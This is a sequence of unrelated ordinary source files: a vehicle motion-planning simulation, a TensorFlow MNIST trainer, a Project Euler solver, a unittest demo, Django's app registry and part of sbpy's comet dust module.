    def motion_planner(self):
        """ Very basic motion planning: simpl computing safe velocities """
        l_FP = len(self.FP)
        self.v_safe = [ self.v_max for i in range(l_FP - 1) ] # initially
        for other_cav_id in self.CZ:
            if len(self.CZ[other_cav_id]) < 1: continue # no confict with car `other_cav_id`
            c = self.CZ[other_cav_id][0] # consider only first CZ
            if c["advantage"] == self.ID: continue # nothing to do
            cz, begin = c["self"]["cz"], c["self"]["begin"]
            d_c = [] # FP-edge distances (cm) from cz
            for k in range(cz[0]):
                tmp_d_c = None
                if k == 0: tmp_d_c = (100 * begin) - 0.5 * dist(self.FP[0], self.FP[1])
                else: tmp_d_c = d_c[-1] - 0.5 * (dist(self.FP[k-1], self.FP[k]) + dist(self.FP[k], self.FP[k+1]))
                if (-10 < tmp_d_c) and (tmp_d_c < 0): tmp_d_c = 0 # tolerate small negative rounding
                if tmp_d_c < 0: break
                d_c.append(tmp_d_c)
            # self.logFile.write(f"\nother_cav_id = {other_cav_id}\nd_c = {d_c}\n")
            l_d_c = len(d_c)
            rho = config.rho / 1000.0 # s
            b = np.abs(self.a_brake) # m/s2
            for i in range(l_d_c):
                # Largest speed from which the CAV can still stop before the zone (reaction + braking).
                self.v_safe[i] = min(self.v_safe[i], self.v_max, ((( ((b*rho)**2) + (2*b*d_c[i]/100) )**0.5) - (b * rho)))
        self.timestamp += poisson(config.poi_avg["motion_planner"])
        self.logFile.write(f"\nv_safe\n{self.v_safe}\n")
    def PID(self, t=0):
        """ Simulate PID controller and vehicle (plant) for time `t` """
        if t == 0: return
        v_ref, phi_ref = self.v, self.phi
        dt = (t / config.PID_ITERS) / 1e6 # t is in microseconds (us)
        for _ in range(config.PID_ITERS):
            ev, ephi = (v_ref - self.v), (phi_ref - self.phi)
            ev_dot, ephi_dot = ((ev-self.v) / dt), ((ephi-self.phi) / dt)
            ev_sum, ephi_sum = (self.v + (ev * dt)), (self.phi + (ephi * dt))
            a, psi = self.a, self.psi
            self.a = (config.kP_a * ev) + (config.kI_a * ev_sum) + (config.kD_a * ev_dot)
            if self.a < (-self.a_max): self.a = -self.a_max
            elif self.a > self.a_max: self.a = self.a_max
            self.psi = (config.kP_psi * ev) + (config.kI_psi * ephi_sum) + (config.kD_psi * ephi_dot)
            if self.psi < (-np.pi/8): self.psi = -np.pi/8
            elif self.psi > (np.pi/8): self.psi = np.pi/8
            x = self.x + (self.v * np.cos(self.phi) * dt)
            y = self.y + (self.v * np.sin(self.phi) * dt)
            phi = self.phi + (self.v * np.tan(psi) * dt / config.L)
            v = self.v + (a * dt)
            if v < 0: v = 0
            # self.x, self.y, self.phi, self.v = x, y, phi, v
            # NOTE(review): the block below discards the PID-integrated phi/v and
            # snaps them back to the reference values each iteration, so only the
            # position integration survives — presumably a deliberate simplification;
            # confirm before re-enabling the commented assignment above.
            x = self.x + (self.v * np.cos(self.phi) * dt)
            y = self.y + (self.v * np.sin(self.phi) * dt)
            phi = phi_ref
            v = v_ref
            if v < 0: v = 0
            self.x, self.y, self.phi, self.v = x, y, phi, v
    def motion_controller(self):
        """ Determine current `self.x` and `self.y`. Compute and save next `self.v` and `self.phi` """
        self.timestamp += poisson(config.poi_avg["motion_controller"])
        dt = self.timestamp - self.lastMcTs # us
        self.lastMcTs = self.timestamp
        self.PID(dt)
        # Find the granule of the future path closest to the current position.
        l_FP = len(self.FP)
        cfp_i, d = None, float('inf') # closest FP index and its distance
        for i in range(l_FP):
            tmp_d = dist({ "x" : (100*self.x), "y" : (100*self.y) }, self.FP[i])
            if tmp_d < d:
                d = tmp_d
                cfp_i = i
        self.logFile.write(f"\nclosest_fp = {cfp_i} : {self.FP[cfp_i]}\n")
        # Commanded speed: the safe speed of the adjacent FP edge(s).
        if cfp_i == 0 : self.v = self.v_safe[0]
        elif cfp_i == (l_FP - 1) : self.v = self.v_safe[-1]
        else: self.v = 0.5 * ( self.v_safe[cfp_i-1] + self.v_safe[cfp_i] )
        self.lookAhead = self.FP[cfp_i]["e_end"] # always defined (not None) and a part of self.SP
        # Point the heading straight at the look-ahead waypoint.
        self.phi = np.arctan2(
            config.WPs[self.lookAhead]["y"] - (self.y * 100), # cm
            config.WPs[self.lookAhead]["x"] - (self.x * 100) # cm
        )
        self.logFile.write(f"\nTS = lastMcTs = {self.timestamp} us\n")
        self.logFile.write(f"\nx = {self.x} m, y = {self.y} m\n")
        self.logFile.write(f"\nv = {self.v} m/s, phi = {self.phi} radians\n")
        tmp = config.WPs[self.lookAhead]
        self.logFile.write(f"\nlookAhead = {self.lookAhead} : ({tmp['x']/100} m, {tmp['y']/100} m)\n")
        self.trajFile.write(f"{self.timestamp/1000},{self.x*100},{self.y*100},{self.phi*180/np.pi},{self.v},{self.lookAhead},{tmp['x']},{tmp['y']}\n")
        self.trajFileJson.write(f"{',' if (self.iter != 0) else ''}\n  " + '{')
        self.trajFileJson.write(f" \"ts\" : {self.timestamp/1000},")
        self.trajFileJson.write(f" \"x\" : {self.x*100}, \"y\" : {self.y*100},")
        self.trajFileJson.write(f" \"phi\" : {self.phi * 180.0 / np.pi}, \"v\" : {self.v} " + '}')
    ######## BROADCASTING STUFF ########
    ####################################
    def broadcast_info(self):
        # Share kinematics and the future path with every peer.
        config.S.broadcast({
            "ID" : self.ID, "timestamp" : self.timestamp, # this TS is broadcast start time
            "v" : self.v, "v_max" : self.v_max,
            "FP" : self.FP, "fpStartTs" : self.fpStartTs # this TS is fpStart start time
        })
    def receive_others_info(self):
        # Collect peers' broadcasts, dropping our own echo.
        others_Info, self.timestamp = config.S.receive()
        del others_Info[self.ID]
        self.Others_Info = others_Info
        # self.logFile.write(f"\nOthers_Info\n{objStr(self.Others_Info)}\n")
    def broadcast_PDG(self):
        # Share our partial dependency graph with every peer.
        config.S.broadcast({
            "ID" : self.ID, "timestamp" : self.timestamp,
            "PDG" : self.PDG
        })
    def receive_others_PDGs(self):
        # Collect peers' PDGs (keyed by CAV ID), dropping our own echo.
        others_PDG, self.timestamp = config.S.receive()
        del others_PDG[self.ID]
        self.Others_PDG = {}
        for ID in others_PDG:
            self.Others_PDG[ID] = others_PDG[ID]["PDG"]
        # self.logFile.write(f"\nOthers_PDG\n{self.Others_PDG}\n")
    def execute(self):
        """ Thread entry point: plan / negotiate / drive loop until the destination is reached. """
        while True: # main loop
            self.logFile.write(f"\n########################################\n")
            self.logFile.write(f"\n######## ITERATION {self.iter}: ########\n")
            self.logFile.write(f"\n########################################\n")
            if self.hasReachedDest():
                config.S.dontCare()
                self.logFile.write(f"TS-{self.timestamp}: Reached Destination.\n")
                self.logFile.write(f"Iterations Executed: {self.iter + 1}\n")
                exit(0)
            self.compute_future_path()
            self.broadcast_info()
            self.receive_others_info()
            self.find_conflict_zones_all_CAVs()
            self.broadcast_PDG()
            self.receive_others_PDGs()
            self.construct_CDG()
            self.deadlock_resolution()
            self.motion_planner()
            self.motion_controller()
            # ############################################################################################
            # ######## near the point (7.03 m, 5.03 m) let the slow vehicle increase its velocity ########
            # ############################################################################################
            # if self.ID == 2:
            #     if dist({ "x" : self.x, "y" : self.y }, { "x" : 7.03, "y" : 5.03 }) <= 0.7:
            #         self.v_max = 8
            self.iter += 1
| StarcoderdataPython |
6569632 | import tensorflow as tf
from logging import getLogger
logger = getLogger(__name__)
class MNISTModel(tf.keras.Model):
    """Minimal MNIST classifier: Flatten -> Dense(128, relu) -> Dense(10, softmax)."""
    def __init__(self):
        super(MNISTModel, self).__init__()
        self.flatten = tf.keras.layers.Flatten()
        self.d1 = tf.keras.layers.Dense(128, activation="relu")
        self.d2 = tf.keras.layers.Dense(10, activation="softmax")
    def call(self, x):
        # Forward pass: flatten the batch, then hidden layer, then class probabilities.
        x = self.flatten(x)
        x = self.d1(x)
        x = self.d2(x)
        return x
class Trainer:
    """Bundles loss, optimizer and running training metrics; train_step performs one update."""
    def __init__(self):
        self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
        self.optimizer = tf.keras.optimizers.Adam()
        # Running metrics; accumulated across train_step calls until reset by the caller.
        self.train_loss = tf.keras.metrics.Mean(name="train_loss")
        self.train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
            name="train_accuracy"
        )
    @tf.function
    def train_step(self, model, images, labels):
        """One forward/backward pass: apply gradients and update the running metrics."""
        with tf.GradientTape() as tape:
            predictions = model(images)
            loss_val = self.loss(labels, predictions)
        gradients = tape.gradient(loss_val, model.trainable_variables)
        self.optimizer.apply_gradients(zip(gradients, model.trainable_variables))
        self.train_loss(loss_val)
        self.train_accuracy(labels, predictions)
class Predictor:
    """Evaluation-side counterpart of Trainer: loss plus running prediction metrics."""
    def __init__(self):
        self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
        # Running metrics; accumulated across predict_step calls until reset by the caller.
        self.predict_loss = tf.keras.metrics.Mean(name="predict_loss")
        self.predict_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
            name="predict_accuracy"
        )
    @tf.function
    def predict_step(self, model, images, labels):
        """Forward pass only (no gradients); updates the running loss/accuracy metrics."""
        predictions = model(images)
        loss_val = self.loss(labels, predictions)
        self.predict_loss(loss_val)
        self.predict_accuracy(labels, predictions)
class Checkpoint:
    """Wraps tf.train.Checkpoint/CheckpointManager: restores the latest checkpoint
    from _data/ckpts on construction and keeps at most 3 checkpoints on save."""
    def __init__(self, network, optimizer=None):
        # Track the optimizer only when one is supplied (not needed for inference-only use).
        args = {"net": network}
        if optimizer is not None:
            args["optimizer"] = optimizer
        self.ckpt = tf.train.Checkpoint(**args)
        self.manager = tf.train.CheckpointManager(
            self.ckpt, "_data/ckpts", max_to_keep=3
        )
        # Restore the newest checkpoint if present; a None path makes restore a no-op.
        self.ckpt.restore(self.manager.latest_checkpoint)
        if self.manager.latest_checkpoint:
            logger.info(f"Restored from {self.manager.latest_checkpoint}")
        else:
            logger.info("Initializing from scratch.")
    def save_counter(self):
        # Number of saves performed so far, as a plain Python int.
        return self.ckpt.save_counter.numpy()
    def save(self):
        # Persist the current state; returns the path of the new checkpoint.
        return self.manager.save()
| StarcoderdataPython |
1845254 | <filename>modules/dbnd/src/dbnd/_core/task/utils_task.py<gh_stars>100-1000
from dbnd._core.task.task import Task
class UtilityTask(Task):
    """Marker base class for utility tasks; adds no behavior over Task."""
    pass
class DeployTask(UtilityTask):
    """Marker class for deployment tasks; adds no behavior over UtilityTask."""
    pass
| StarcoderdataPython |
11372169 | from question_model import Question
from data import question_data
from quiz_brain import QuizBrain
# Build Question objects from the raw data, then run the quiz to completion.
question_bank = [
    Question(entry["question"], entry["correct_answer"])
    for entry in question_data
]
quiz = QuizBrain(question_bank)
while quiz.still_has_questions():
    quiz.nextQuestion()
print("\nYou completed the Quiz")
print(f"Your final score was: {quiz.score}/{quiz.number}")
3206412 | import math
import time
t1 = time.time()
# Grid is size x size; s holds size*size pseudo-random entries in [-500000, 499999].
size = 2000
sizet = size*size
s = [0]*sizet
# First 55 terms come from the polynomial seed; the rest from a lagged
# Fibonacci generator with lags 24 and 55 (Project Euler problem 149).
for k in range(1,56):
    s[k-1] = (100003-200003*k+300007*k*k*k)%1000000-500000
for k in range(56,4000001):
    s[k-1] = (s[k-1-24]+s[k-1-55]+1000000)%1000000-500000
#print(s[10-1],s[100-1])
'''
# test case
s = [-2,5,3,2,9,-6,5,1,3,2,7,3,-1,8,-4,8]
'''
def getrc(n):
    """Convert a flat index into [row, col] for the size x size grid."""
    return list(divmod(n, size))
def ton(r, c):
    """Convert (row, col) back to the flat index into s."""
    return (r * size) + c
# 1-dimension solution
def getla(tset):
    """Kadane's algorithm: largest sum of any contiguous run of tset (never below 0)."""
    best = 0
    running = 0
    for value in tset:
        running = max(running + value, 0)
        best = max(best, running)
    return best
# The original inlined Kadane's algorithm six times even though getla()
# (defined above) implements exactly that scan; feed each grid line to
# getla instead and keep the running maximum. Behavior and output are
# identical.
la = 0
# Rows.
for i in range(size):
    la = max(la, getla(s[ton(i, j)] for j in range(size)))
# Columns.
for j in range(size):
    la = max(la, getla(s[ton(i, j)] for i in range(size)))
# Anti-diagonals starting in column 0 (running up-right from (i, 0)).
for i in range(size):
    la = max(la, getla(s[ton(i - j, j)] for j in range(i + 1)))
# Remaining anti-diagonals, starting on the bottom row.
for i in range(1, size):
    la = max(la, getla(s[ton(size - 1 - j, i + j)] for j in range(size - i)))
# Diagonals starting on the top row (running down-right from (0, i)).
for i in range(size):
    la = max(la, getla(s[ton(j, i + j)] for j in range(size - i)))
# Remaining diagonals, starting in column 0.
for i in range(1, size):
    la = max(la, getla(s[ton(i + j, j)] for j in range(size - i)))
print(la)
print("time:", time.time() - t1)
| StarcoderdataPython |
8184494 | <reponame>shangpf1/python_study
import unittest
import HTMLReport
class CnodeTest(unittest.TestCase):
    """Demo test case showing unittest fixture ordering (setUpClass/setUp/tearDown/tearDownClass)."""
    # Runs once before all tests; a database connection could be opened here.
    # NOTE(review): the first parameter of a classmethod is conventionally named cls.
    @classmethod
    def setUpClass(self):
        print('this is setupclass')
    # Runs before every test; the browser could be opened here.
    def setUp(self):
        print('this is setup')
    def test_01register(self):
        print('****test_01register')
    def test_02login(self):
        print('****test_02login')
    # Runs after every test; a screenshot could be captured here.
    def tearDown(self):
        print('this is teardown')
    # Runs once after all tests; the browser could be closed here.
    @classmethod
    def tearDownClass(self):
        print('this is teardownclass')
def suite():
    """Assemble the Cnode test suite in explicit execution order."""
    test_suite = unittest.TestSuite()
    test_suite.addTests([
        CnodeTest('test_01register'),
        CnodeTest('test_02login'),
    ])
    return test_suite
if __name__ == '__main__':
    # NOTE(review): rebinding the name 'suite' shadows the suite() factory above.
    suite=suite()
    # Test-case runner that renders an HTML report.
    runner = HTMLReport.TestRunner(report_file_name='test',  # report file name, default "test"
                                   output_path='report',  # output folder name, default "report"
                                   verbosity=2,  # console output detail level, default 2
                                   title='测试报告',  # report title, default "测试报告" ("test report")
                                   description='无测试描述',  # report description, default "无测试描述" ("no description")
                                   thread_count=1,  # number of concurrent threads (unordered execution), default 1
                                   # Whether to execute in the order suites were added (addTests);
                                   sequential_execution=True
                                   # waits for one addTests batch to finish before starting the next, default False
                                   )
    # Run the assembled test suite.
    runner.run(suite)
| StarcoderdataPython |
4824210 | <gh_stars>1-10
import sys
import threading
import warnings
from collections import Counter, OrderedDict, defaultdict
from functools import partial
from django.core.exceptions import AppRegistryNotReady, ImproperlyConfigured
from django.utils import lru_cache
from .config import AppConfig
class Apps(object):
"""
A registry that stores the configuration of installed applications.
It also keeps track of models eg. to provide reverse-relations.
"""
    def __init__(self, installed_apps=()):
        """
        installed_apps -- iterable of app entries (dotted paths or AppConfig
        instances). Must be None only for the module-level master registry,
        which is populated later.
        """
        # installed_apps is set to None when creating the master registry
        # because it cannot be populated at that point. Other registries must
        # provide a list of installed apps and are populated immediately.
        if installed_apps is None and hasattr(sys.modules[__name__], 'apps'):
            raise RuntimeError("You must supply an installed_apps argument.")
        # Mapping of app labels => model names => model classes. Every time a
        # model is imported, ModelBase.__new__ calls apps.register_model which
        # creates an entry in all_models. All imported models are registered,
        # regardless of whether they're defined in an installed application
        # and whether the registry has been populated. Since it isn't possible
        # to reimport a module safely (it could reexecute initialization code)
        # all_models is never overridden or reset.
        self.all_models = defaultdict(OrderedDict)
        # Mapping of labels to AppConfig instances for installed apps.
        self.app_configs = OrderedDict()
        # Stack of app_configs. Used to store the current state in
        # set_available_apps and set_installed_apps.
        self.stored_app_configs = []
        # Whether the registry is populated.
        self.apps_ready = self.models_ready = self.ready = False
        # Lock for thread-safe population.
        self._lock = threading.Lock()
        # Maps ("app_label", "modelname") tuples to lists of functions to be
        # called when the corresponding model is ready. Used by this class's
        # `lazy_model_operation()` and `do_pending_operations()` methods.
        self._pending_operations = defaultdict(list)
        # Populate apps and models, unless it's the master registry.
        if installed_apps is not None:
            self.populate(installed_apps)
    def populate(self, installed_apps=None):
        """
        Loads application configurations and models.
        This method imports each application module and then each model module.
        It is thread safe and idempotent, but not reentrant.
        Readiness is advanced in three stages: apps_ready, models_ready, ready.
        """
        if self.ready:
            return
        # populate() might be called by two threads in parallel on servers
        # that create threads before initializing the WSGI callable.
        with self._lock:
            if self.ready:
                return
            # app_config should be pristine, otherwise the code below won't
            # guarantee that the order matches the order in INSTALLED_APPS.
            if self.app_configs:
                raise RuntimeError("populate() isn't reentrant")
            # Load app configs and app modules.
            for entry in installed_apps:
                if isinstance(entry, AppConfig):
                    app_config = entry
                else:
                    app_config = AppConfig.create(entry)
                if app_config.label in self.app_configs:
                    raise ImproperlyConfigured(
                        "Application labels aren't unique, "
                        "duplicates: %s" % app_config.label)
                self.app_configs[app_config.label] = app_config
            # Check for duplicate app names.
            counts = Counter(
                app_config.name for app_config in self.app_configs.values())
            duplicates = [
                name for name, count in counts.most_common() if count > 1]
            if duplicates:
                raise ImproperlyConfigured(
                    "Application names aren't unique, "
                    "duplicates: %s" % ", ".join(duplicates))
            self.apps_ready = True
            # Load models.
            for app_config in self.app_configs.values():
                all_models = self.all_models[app_config.label]
                app_config.import_models(all_models)
            self.clear_cache()
            self.models_ready = True
            # With models in place, run each app's ready() callback.
            for app_config in self.get_app_configs():
                app_config.ready()
            self.ready = True
def check_apps_ready(self):
"""
Raises an exception if all apps haven't been imported yet.
"""
if not self.apps_ready:
raise AppRegistryNotReady("Apps aren't loaded yet.")
def check_models_ready(self):
"""
Raises an exception if all models haven't been imported yet.
"""
if not self.models_ready:
raise AppRegistryNotReady("Models aren't loaded yet.")
def get_app_configs(self):
"""
Imports applications and returns an iterable of app configs.
"""
self.check_apps_ready()
return self.app_configs.values()
def get_app_config(self, app_label):
"""
Imports applications and returns an app config for the given label.
Raises LookupError if no application exists with this label.
"""
self.check_apps_ready()
try:
return self.app_configs[app_label]
except KeyError:
message = "No installed app with label '%s'." % app_label
for app_config in self.get_app_configs():
if app_config.name == app_label:
message += " Did you mean '%s'?" % app_config.label
break
raise LookupError(message)
# This method is performance-critical at least for Django's test suite.
@lru_cache.lru_cache(maxsize=None)
def get_models(self, include_auto_created=False, include_swapped=False):
"""
Returns a list of all installed models.
By default, the following models aren't included:
- auto-created models for many-to-many relations without
an explicit intermediate table,
- models created to satisfy deferred attribute queries,
- models that have been swapped out.
Set the corresponding keyword argument to True to include such models.
"""
self.check_models_ready()
result = []
for app_config in self.app_configs.values():
result.extend(list(app_config.get_models(include_auto_created, include_swapped)))
return result
def get_model(self, app_label, model_name=None):
"""
Returns the model matching the given app_label and model_name.
As a shortcut, this function also accepts a single argument in the
form <app_label>.<model_name>.
model_name is case-insensitive.
Raises LookupError if no application exists with this label, or no
model exists with this name in the application. Raises ValueError if
called with a single argument that doesn't contain exactly one dot.
"""
self.check_models_ready()
if model_name is None:
app_label, model_name = app_label.split('.')
return self.get_app_config(app_label).get_model(model_name.lower())
def register_model(self, app_label, model):
# Since this method is called when models are imported, it cannot
# perform imports because of the risk of import loops. It mustn't
# call get_app_config().
model_name = model._meta.model_name
app_models = self.all_models[app_label]
if model_name in app_models:
if (model.__name__ == app_models[model_name].__name__ and
model.__module__ == app_models[model_name].__module__):
warnings.warn(
"Model '%s.%s' was already registered. "
"Reloading models is not advised as it can lead to inconsistencies, "
"most notably with related models." % (app_label, model_name),
RuntimeWarning, stacklevel=2)
else:
raise RuntimeError(
"Conflicting '%s' models in application '%s': %s and %s." %
(model_name, app_label, app_models[model_name], model))
app_models[model_name] = model
self.do_pending_operations(model)
self.clear_cache()
def is_installed(self, app_name):
"""
Checks whether an application with this name exists in the registry.
app_name is the full name of the app eg. 'django.contrib.admin'.
"""
self.check_apps_ready()
return any(ac.name == app_name for ac in self.app_configs.values())
def get_containing_app_config(self, object_name):
"""
Look for an app config containing a given object.
object_name is the dotted Python path to the object.
Returns the app config for the inner application in case of nesting.
Returns None if the object isn't in any registered app config.
"""
self.check_apps_ready()
candidates = []
for app_config in self.app_configs.values():
if object_name.startswith(app_config.name):
subpath = object_name[len(app_config.name):]
if subpath == '' or subpath[0] == '.':
candidates.append(app_config)
if candidates:
return sorted(candidates, key=lambda ac: -len(ac.name))[0]
def get_registered_model(self, app_label, model_name):
"""
Similar to get_model(), but doesn't require that an app exists with
the given app_label.
It's safe to call this method at import time, even while the registry
is being populated.
"""
model = self.all_models[app_label].get(model_name.lower())
if model is None:
raise LookupError(
"Model '%s.%s' not registered." % (app_label, model_name))
return model
@lru_cache.lru_cache(maxsize=None)
def get_swappable_settings_name(self, to_string):
"""
For a given model string (e.g. "auth.User"), return the name of the
corresponding settings name if it refers to a swappable model. If the
referred model is not swappable, return None.
This method is decorated with lru_cache because it's performance
critical when it comes to migrations. Since the swappable settings don't
change after Django has loaded the settings, there is no reason to get
the respective settings attribute over and over again.
"""
for model in self.get_models(include_swapped=True):
swapped = model._meta.swapped
# Is this model swapped out for the model given by to_string?
if swapped and swapped == to_string:
return model._meta.swappable
# Is this model swappable and the one given by to_string?
if model._meta.swappable and model._meta.label == to_string:
return model._meta.swappable
return None
def set_available_apps(self, available):
"""
Restricts the set of installed apps used by get_app_config[s].
available must be an iterable of application names.
set_available_apps() must be balanced with unset_available_apps().
Primarily used for performance optimization in TransactionTestCase.
This method is safe is the sense that it doesn't trigger any imports.
"""
available = set(available)
installed = set(app_config.name for app_config in self.get_app_configs())
if not available.issubset(installed):
raise ValueError(
"Available apps isn't a subset of installed apps, extra apps: %s"
% ", ".join(available - installed)
)
self.stored_app_configs.append(self.app_configs)
self.app_configs = OrderedDict(
(label, app_config)
for label, app_config in self.app_configs.items()
if app_config.name in available)
self.clear_cache()
def unset_available_apps(self):
"""
Cancels a previous call to set_available_apps().
"""
self.app_configs = self.stored_app_configs.pop()
self.clear_cache()
def set_installed_apps(self, installed):
"""
Enables a different set of installed apps for get_app_config[s].
installed must be an iterable in the same format as INSTALLED_APPS.
set_installed_apps() must be balanced with unset_installed_apps(),
even if it exits with an exception.
Primarily used as a receiver of the setting_changed signal in tests.
This method may trigger new imports, which may add new models to the
registry of all imported models. They will stay in the registry even
after unset_installed_apps(). Since it isn't possible to replay
imports safely (eg. that could lead to registering listeners twice),
models are registered when they're imported and never removed.
"""
if not self.ready:
raise AppRegistryNotReady("App registry isn't ready yet.")
self.stored_app_configs.append(self.app_configs)
self.app_configs = OrderedDict()
self.apps_ready = self.models_ready = self.ready = False
self.clear_cache()
self.populate(installed)
def unset_installed_apps(self):
"""
Cancels a previous call to set_installed_apps().
"""
self.app_configs = self.stored_app_configs.pop()
self.apps_ready = self.models_ready = self.ready = True
self.clear_cache()
def clear_cache(self):
"""
Clears all internal caches, for methods that alter the app registry.
This is mostly used in tests.
"""
# Call expire cache on each model. This will purge
# the relation tree and the fields cache.
self.get_models.cache_clear()
if self.ready:
# Circumvent self.get_models() to prevent that the cache is refilled.
# This particularly prevents that an empty value is cached while cloning.
for app_config in self.app_configs.values():
for model in app_config.get_models(include_auto_created=True):
model._meta._expire_cache()
    def lazy_model_operation(self, function, *model_keys):
        """
        Take a function and a number of ("app_label", "modelname") tuples, and
        when all the corresponding models have been imported and registered,
        call the function with the model classes as its arguments.
        The function passed to this method must accept exactly n models as
        arguments, where n=len(model_keys).
        """
        # model_keys entries are ("app_label", "modelname") pairs, i.e. the
        # same keys used by self._pending_operations and register_model().
        # Base case: no arguments, just execute the function.
        if not model_keys:
            function()
        # Recursive case: take the head of model_keys, wait for the
        # corresponding model class to be imported and registered, then apply
        # that argument to the supplied function. Pass the resulting partial
        # to lazy_model_operation() along with the remaining model args and
        # repeat until all models are loaded and all arguments are applied.
        else:
            next_model, more_models = model_keys[0], model_keys[1:]
            # This will be executed after the class corresponding to next_model
            # has been imported and registered. The `func` attribute provides
            # duck-type compatibility with partials.
            def apply_next_model(model):
                next_function = partial(apply_next_model.func, model)
                self.lazy_model_operation(next_function, *more_models)
            apply_next_model.func = function
            # If the model has already been imported and registered, partially
            # apply it to the function now. If not, add it to the list of
            # pending operations for the model, where it will be executed with
            # the model class as its sole argument once the model is ready.
            try:
                model_class = self.get_registered_model(*next_model)
            except LookupError:
                self._pending_operations[next_model].append(apply_next_model)
            else:
                apply_next_model(model_class)
def do_pending_operations(self, model):
"""
Take a newly-prepared model and pass it to each function waiting for
it. This is called at the very end of `Apps.register_model()`.
"""
key = model._meta.app_label, model._meta.model_name
for function in self._pending_operations.pop(key, []):
function(model)
# Master registry instance shared by the whole process; populated later
# (installed_apps=None defers populate() until setup runs).
apps = Apps(installed_apps=None)
| StarcoderdataPython |
6496869 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
==========================
SBPy Activity: Dust Module
==========================
All things dust coma related.
Functions
---------
phase_HalleyMarcus - Halley-Marcus composite dust phase function.
Classes
-------
Afrho - Coma dust quantity of A'Hearn et al. (1984).
Efrho - Thermal emission equivalent of Afrho.
Syndynes - Dust dynamical model for zero-ejection velocities.
"""
import numpy as np
import astropy.units as u
# Public API of this module (controls `from ... import *`).
__all__ = [
    'phase_HalleyMarcus',
    'Afrho',
    'Efrho',
    'Syndynes'
]
def phase_HalleyMarcus(phase):
    """
    Halley-Marcus composite dust phase function.
    Uses `~scipy.interpolate` for spline interpolation, otherwise uses
    linear interpolation from `~numpy.interp`.
    Parameters
    ----------
    phase : `~astropy.units.Quantity`
        Phase angle.
    Returns
    -------
    Phi : float or `~np.ndarray`
    Notes
    -----
    The Halley-Marcus phase function was first used by Schleicher and
    Bair (2011), but only described in detail by Schleicher and Marcus
    (May 2010) online at:
    http://asteroid.lowell.edu/comet/dustphase.html
        "To distinguish this curve from others, we designate this as
        the HM phase function, for the sources of the two components:
        Halley and Marcus, where the Halley curve for smaller phase
        angles comes from our previous work (Schleicher et al. 1998)
        while Joe Marcus has fit a Henyey-Greenstein function to a
        variety of mid- and large-phase angle data sets (Marcus 2007);
        see here for details. Note that we do not consider our
        composite curve to be a definitive result, but rather
        appropriate for performing first-order adjustments to dust
        measurements for changing phase angle."
    References
    ----------
    Schleicher & Bair 2011, AJ 141, 177.
    Schleicher, Millis, & Birch 1998, Icarus 132, 397-417.
    Marcus 2007, International Comets Quarterly 29, 39-66.
    Examples
    --------
    >>> from sbpy.activity import phase_HalleyMarcus
    >>> import astropy.units as u
    >>> phase_HalleyMarcus(0 * u.deg)     # doctest: +FLOAT_CMP
    1.0
    >>> phase_HalleyMarcus(15 * u.deg)    # doctest: +FLOAT_CMP
    5.8720e-01
    """
    from .. import bib
    bib.register(
        'activity.dust.phase_HalleyMarcus',
        {
            'Halley phase function': '1998Icar..132..397S',
            'Marcus phase function': '2007ICQ....29...39M'
        }
    )
    # Tabulated phase function, one value per degree of phase angle
    # (0 to 180 deg), normalized to 1.0 at 0 deg.
    th = np.arange(181)
    ph = np.array(
        [1.0000e+00, 9.5960e-01, 9.2170e-01, 8.8590e-01,
         8.5220e-01, 8.2050e-01, 7.9060e-01, 7.6240e-01,
         7.3580e-01, 7.1070e-01, 6.8710e-01, 6.6470e-01,
         6.4360e-01, 6.2370e-01, 6.0490e-01, 5.8720e-01,
         5.7040e-01, 5.5460e-01, 5.3960e-01, 5.2550e-01,
         5.1220e-01, 4.9960e-01, 4.8770e-01, 4.7650e-01,
         4.6590e-01, 4.5590e-01, 4.4650e-01, 4.3770e-01,
         4.2930e-01, 4.2150e-01, 4.1420e-01, 4.0730e-01,
         4.0090e-01, 3.9490e-01, 3.8930e-01, 3.8400e-01,
         3.7920e-01, 3.7470e-01, 3.7060e-01, 3.6680e-01,
         3.6340e-01, 3.6030e-01, 3.5750e-01, 3.5400e-01,
         3.5090e-01, 3.4820e-01, 3.4580e-01, 3.4380e-01,
         3.4210e-01, 3.4070e-01, 3.3970e-01, 3.3890e-01,
         3.3850e-01, 3.3830e-01, 3.3850e-01, 3.3890e-01,
         3.3960e-01, 3.4050e-01, 3.4180e-01, 3.4320e-01,
         3.4500e-01, 3.4700e-01, 3.4930e-01, 3.5180e-01,
         3.5460e-01, 3.5760e-01, 3.6090e-01, 3.6450e-01,
         3.6830e-01, 3.7240e-01, 3.7680e-01, 3.8150e-01,
         3.8650e-01, 3.9170e-01, 3.9730e-01, 4.0320e-01,
         4.0940e-01, 4.1590e-01, 4.2280e-01, 4.3000e-01,
         4.3760e-01, 4.4560e-01, 4.5400e-01, 4.6270e-01,
         4.7200e-01, 4.8160e-01, 4.9180e-01, 5.0240e-01,
         5.1360e-01, 5.2530e-01, 5.3750e-01, 5.5040e-01,
         5.6380e-01, 5.7800e-01, 5.9280e-01, 6.0840e-01,
         6.2470e-01, 6.4190e-01, 6.5990e-01, 6.7880e-01,
         6.9870e-01, 7.1960e-01, 7.4160e-01, 7.6480e-01,
         7.8920e-01, 8.1490e-01, 8.4200e-01, 8.7060e-01,
         9.0080e-01, 9.3270e-01, 9.6640e-01, 1.0021e+00,
         1.0399e+00, 1.0799e+00, 1.1223e+00, 1.1673e+00,
         1.2151e+00, 1.2659e+00, 1.3200e+00, 1.3776e+00,
         1.4389e+00, 1.5045e+00, 1.5744e+00, 1.6493e+00,
         1.7294e+00, 1.8153e+00, 1.9075e+00, 2.0066e+00,
         2.1132e+00, 2.2281e+00, 2.3521e+00, 2.4861e+00,
         2.6312e+00, 2.7884e+00, 2.9592e+00, 3.1450e+00,
         3.3474e+00, 3.5685e+00, 3.8104e+00, 4.0755e+00,
         4.3669e+00, 4.6877e+00, 5.0418e+00, 5.4336e+00,
         5.8682e+00, 6.3518e+00, 6.8912e+00, 7.4948e+00,
         8.1724e+00, 8.9355e+00, 9.7981e+00, 1.0777e+01,
         1.1891e+01, 1.3166e+01, 1.4631e+01, 1.6322e+01,
         1.8283e+01, 2.0570e+01, 2.3252e+01, 2.6418e+01,
         3.0177e+01, 3.4672e+01, 4.0086e+01, 4.6659e+01,
         5.4704e+01, 6.4637e+01, 7.7015e+01, 9.2587e+01,
